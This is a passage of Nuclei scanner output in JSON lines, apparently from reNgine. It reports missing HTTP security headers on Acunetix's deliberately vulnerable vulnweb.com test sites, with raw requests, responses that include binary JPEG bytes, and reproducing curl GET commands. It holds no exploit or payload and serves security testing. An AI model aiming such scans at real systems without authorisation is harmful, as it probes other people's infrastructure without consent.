\\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:33.133809816Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:33.133853563Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:33.133939389Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH 